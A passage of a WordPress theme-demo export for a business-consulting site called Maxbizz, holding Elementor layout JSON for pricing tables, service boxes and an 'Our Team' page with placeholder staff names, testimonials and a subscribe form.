strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"173ab3c","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e4501d0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"content_position":"center","align":"space-evenly","_ot_content_align":"horizontal"},"elements":[{"id":"6e13157","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"712f4c6","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a0928a2","elType":"widget","settings":{"title":"Pricing Tables","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4b24f46","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3254d38","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"01efe9e","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"16a9414","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"15b3e04","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"26f11eb","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"25be18a","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"d184df3","elType":"widget","settings":{"title":"Flip Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0457628","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"08202ed","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a0f08f5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"0ed39b4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a2601a1","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"ec866a8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"77a09fc","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More"},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true},{"id":"23a755c","elType":"widget","settings":{"title":"Service Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"611b0b8","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"38c3fac","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"b22c2fd","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9039823","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f7959fa","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"87c6b1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"417a646","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","box_bg":"#FFFFFF","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[publish]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_time]]></wp:meta_key>
		<wp:meta_value><![CDATA[1609236235]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_desired_post_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[elements]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=690</guid>
		<description></description>
		<content:encoded><![CDATA[our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team5.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team5-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Mary Flynn</h6>				CHIEF TECHNOLOGY OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team6.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team6-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Adam Oswald</h6>				CHIEF MARKETING OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team7.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team7.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team7-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Kate Green</h6>				CHIEF FINANCIAL OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team8.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team8.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team8-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Harry Septem</h6>				co-founder of company			
	        our benefits	        <h2>Entrust Your Project to  Our Specialists</h2>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
										<img width="959" height="650" src="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg 959w, https://maxbizz.s3.amazonaws.com/images/image1-team-1-300x203.jpg 300w, https://maxbizz.s3.amazonaws.com/images/image1-team-1-768x521.jpg 768w" sizes="(max-width: 959px) 100vw, 959px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>690</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"c0972f9","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"a497b47","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"851ebdc","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5cea06f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"3c8329c","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"d1c3196","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"e34f121","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"051be26","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"4dda4d5","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7893ae6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2bcb443","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":2056},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c6f2cd2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3045fbb","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":2057},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"05a209e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2585422","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":2058},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"3f0bea3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"659956f","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":2059},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"b1c7f19","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"419a6b1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"65aaf12","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team5.jpg","id":2060},"member_name":"Mary Flynn","member_extra":"CHIEF TECHNOLOGY OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"2b58641","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"23fa50d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team6.jpg","id":2061},"member_name":"Adam Oswald","member_extra":"CHIEF MARKETING OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"42171b0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1c6c26d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team7.jpg","id":2062},"member_name":"Kate Green","member_extra":"CHIEF FINANCIAL OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab 